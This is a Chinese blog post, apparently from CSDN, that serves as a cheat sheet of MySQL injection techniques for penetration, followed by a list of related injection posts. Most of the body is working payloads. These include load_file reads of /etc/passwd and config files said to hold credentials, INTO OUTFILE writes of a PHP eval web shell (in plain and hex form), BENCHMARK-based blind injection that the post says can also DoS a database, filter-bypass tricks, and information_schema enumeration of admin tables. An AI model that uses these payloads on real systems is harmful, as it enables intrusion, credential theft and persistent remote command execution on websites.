mysql 注入用例_mysql-常用注入渗透手法

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量242 收藏
点赞数
文章标签: mysql 注入用例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42127020/article/details/113224302
版权

mysql:

内置函数常用函数:left(), mid(), ord(),  length(), benchmark(),load_file(), outfile(), concat(),

系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),

ASCII码:select char(97,100,109,105,110 ) 回显:admin

16进制:select 0x61646D696E 回显:admin

注释方法: /*  --

使用 /**/ 或者 + 代替空格

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

load_file:linux,windows写全路径时候,c:/1.txt, /var/www/1.php  路径均为左斜杠 /

c:/windows/php.ini  c:/winnt/php.ini   c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名  c:/winnt/my.ini   c:/boot.ini

/etc/password /   /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录   /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!FreeBSD下:

load_file(char(47))  列出了此FreeBSD系统的根目录

读不出来的原因:1.权限不够:  and (select count(*) from mysql.user)>0--  如果返回OK,则表示有权限。如果Denied则NO

2.回显长度限制,Substring(load_file(A),0,50),Substring(load_file(A),50,100)一步一步读  3.concat()拼接

outfile:写入条件:1. 未过滤' '  2.权限  3.得到网站物理路径

已经上传了JPG小马,  unionselect 1,load_file( /var/www/xiaoma.jpg),3,4,5,6 into outfile '/var/www/xiaoma.php'/*

直接写入小马,union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/var/www/xm.php'/*

||

等价于

||

0x3C3F706870206576616C28245F504F53545B636D645D293F3E

数据库导出马:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

create databaseSupers;useSupers;create table SuperT(code text);insert into SuperT(code) values ("<?php @eval($_POST['cmd']);?>");select * from SuperT intooutfile "D:\\xxx\\shell.php";drop database Supers;

View Code

BENCHMARK:重复执行。不仅可以在display_errors=Off时候,无法判断SQL正确与否。让我们盲注的时候判断技巧。而且可以用来DDOS攻击数据库!

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*UNION SELECT IF(SUBSTRING(user_password,1 ,1) = CHAR(52),BENCHMARK(5000000,md5('test')),null) FROM mb_users WHERE user_group = 1;

View Code

绕过防注入:

id=-255+union+/*!select*/+1,2,3,4    +号代替被顾虑的空格, !

and 1=2 un%ion sel%ect 1,2,3,4,sys%tem_us%er()  %绕过被过滤的SQL语句

爆表:

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- 爆出第1个表

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 1,1) t order by table_schema desc)t limit 1-- 爆出第2个表

......爆出所有有用的表后,假如得到admin表: 0x61646D696E

select 0,0,concat(cast(count(*) as char)),0 from information_schema.columns where table_name=0x61646D696Eand table_schema=database() limit 1--  爆出ADMIN表的列数

select 0,0,concat(column_name) from (select * from (select * from information_schema.columns wheretable_name=0x61646D696E and table_schema=database() order by 1 limit 0,1) t order by 1 desc)t limit 1-- 爆出ADMIN表第一个列。即索引为0的列...

root或者足够权限可以爆数据库用户帐户,密码:user password

男爵兔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入
zhuangsle的博客
08-27 402
MySQL注入 一、MySQL 4和MySQL 5注入的区别 (一)MySQL 4 注入方法 1、概述 ​ MySQL 4以及之前的版本中,不支持子语句查询,且没有系统库information_schema,而且当php.ini文件中开启了magic_quote_gpc=on时,提交的变量中的字符(例如单引号,双引号,反斜杠,and,空字符等)会被数据库自动转化为含有反斜杠的转义字符,在这种情况下,MySQL 4版本中,我们进行注入的方法是类似于access数据库注入的方法仅查询猜解。 2、常见方法 逐
MySQL 手工注入常用语句
热门推荐
龙哥盟
03-02 4万+
判断是否存在SQL注入' and 1=1 and 1=2暴字段长度Order by 数字匹配字段and 1=1 union select 1,2,..,n暴字段位置and 1=2 union select 1,2,..,n利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select ve
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1101
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MySQL常用注入方式总结笔记
EC_Carrot的博客
11-10 968
目录MySQL中的注释获取元数据UNION查询MySQL函数利用MySQL显错式注入宽字节注入MySQL长字符截断延迟注入 MySQL中的注释 MySQL支持以下三种注释风格: #:注释从"#"字符到行尾 --:注释从"--"序列到行尾。需要注意用此注释后面需要跟一个或多个空格。注:空格与tag都可以 /* */:注释从/*序列到后面*/序列中间的字符 其中,/* */注释有个特点,观察以下sql语句: select id/*!55555, username*/ from users 这句语句是能正常
常见SQL注入类型 2020-10-04
Lelouch_E的博客
10-05 372
常见SQL注入类型最基础的注入-union注入攻击Boolean注入攻击-布尔盲注报错注入攻击时间注入攻击-时间盲注堆叠查询注入攻击二次注入攻击宽字节注入攻击base64 注入攻击cookie注入攻击-http请求头参数注入XFF注入攻击-http请求头参数注入知道绝对路径的注入 最基础的注入-union注入攻击 判断是get型还是post型注入; 找到正确的闭合规则; order by 查询字段数; union select 1,2…# 查询显示位是第几位,没有的话就试试把id=1显示位让
mysql 注入
qq_58970968的博客
07-31 1950
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
liziqun.zip_测试用例_测试用例 算法_测试用例生成_粒子群 用例_群
09-14
分析了软件测试中测试用例自动生成技术的发展现状和粒子群优化算法的基本原理及实现步骤,并详细研究了几种重要的改进的粒子群优化算法。在此基础上,改进了基本粒子群优化算法,提出了基于改进的粒子群优化算法的测试...
Python库 | pytest_mysql-2.0.3-py3-none-any.whl
02-19
`pytest_mysql` 这个库就是这个插件系统的一部分,它允许开发者在测试用例中直接操作 MySQL 数据库,以确保数据库相关的功能正常工作。 ### 使用 pytest_mysql 1. **安装**:首先,你需要安装 `pytest_mysql`。...
TD用例导入----自定义用例描述1
08-08
在软件测试过程中,测试用例的设计与管理是关键步骤之一,它确保了产品功能的全面性和质量的可靠性。本文将详细介绍如何在TestDirector (TD) 中进行自定义用例描述和导入,以及如何添加优先级列。 首先,我们来探讨...
测试用例编写指南----.docx
04-26
"测试用例编写指南" 测试用例编写指南是测试人员在测试设计过程中不可或缺的一份重要指南。该指南旨在使测试人员在测试设计过程中有章可循、有据可依,让测试用例编写规范统一,弥补不同测试人员的知识空缺,进一步...
测试用例设计白皮书--边界值分析方法
03-03
通常边界值分析法是作为对等价类划分法的补充,这种情况下,其测试用例来自等价类的边界。2.与等价划分的区别1)边界值分析不是从某等价类中随便挑一个作为代表,而是使这个等价类的每个边界都要作为测试条件。2)边界...
MySQL注入常用函数及逻辑运算
01-20
原文地址:www.cluren.xyz MySQL注入常用函数: 函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedir 数据库安装路径 @@version_compile_os 操作系统 count() 返回执行结果数量········ concat() 没有分隔符的连接字符串 concat_ws() 含
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
Mysql注入
qq_44790964的博客
10-17 206
如果碰到防注入的一些过滤代码 可以用/**/,+%0a,代替空格 大小写的改变 mysql安装大家可以百度一下 linux安装的话可以用yum -y install httpd php-mysql mysql mysql-server Mysql 打开并启动下phpstudy 然后点击其它选项菜单 选择MySQL工具 选择mysql命令行 然后输入密码 密码一般是root 进入之后输入命令 sho...
Mysql注入
天天学安全专属博客
10-28 4306
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
mysql注入
qq_35856778的博客
09-22 101
注入
mysql数据库注入
weixin_46248422的博客
06-26 765
一、mysql4与5区别 1. MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。 首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。 2.MySQL 5版本由于information_schema库的存在,注.
解释下面这段代码:@pytest.fixture(autouse=True, scope="class") def test1(): print("\n 开始执行class") # 测试用例 def test_a(): print('---用例a执行---') def test_d(): print('---用例d执行---') class Test_Case: def test_b(self): print('---用例b执行---') def test_c(self): print('---用例c执行---') if name == 'main': pytest.main(['-s', 'test_02_auto_scope.py'])
06-13
这段代码是一个使用Python的pytest测试框架编写的测试脚本。它包含了一个测试用例和一个测试类,以及一个pytest的fixture。 - pytest.fixture(autouse=True, scope="class"):这是一个pytest的fixture,用于在测试脚本执行前进行一些准备工作。其中,autouse=True表示这个fixture会自动应用到所有测试函数和测试类中,而scope="class"表示这个fixture的作用范围是整个测试类。 - test_a、test_b、test_c、test_d:这些是测试用例,用于测试被测系统的不同功能点。它们都是普通的Python函数,函数名以test_开头,用于被pytest识别为测试用例。 - Test_Case:这是一个测试类,用于组织多个测试用例,并提供一些共享的数据和方法。它也是一个普通的Python类,类名以Test_开头,用于被pytest识别为测试类。 - if name == 'main': pytest.main(['-s', 'test_02_auto_scope.py']):这是一个简单的main函数,用于运行测试脚本。当直接运行这个脚本时,会调用pytest.main()函数来执行测试用例。其中,-s表示输出测试过程中的print语句,test_02_auto_scope.py表示测试脚本的文件名。 在这个测试脚本中,使用了pytest的fixture机制来管理测试用例的执行环境。autouse=True表示这个fixture会自动应用到所有测试函数和测试类中,而scope="class"表示这个fixture的作用范围是整个测试类。因此,当执行这个测试脚本时,会先执行test1这个fixture函数,然后再依次执行所有的测试用例。在测试用例执行过程中,如果需要使用test1这个fixture提供的数据或资源,可以在测试函数或测试类中声明一个同名的参数。pytest会自动将fixture返回的数据或资源作为参数传递给测试函数或测试类。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值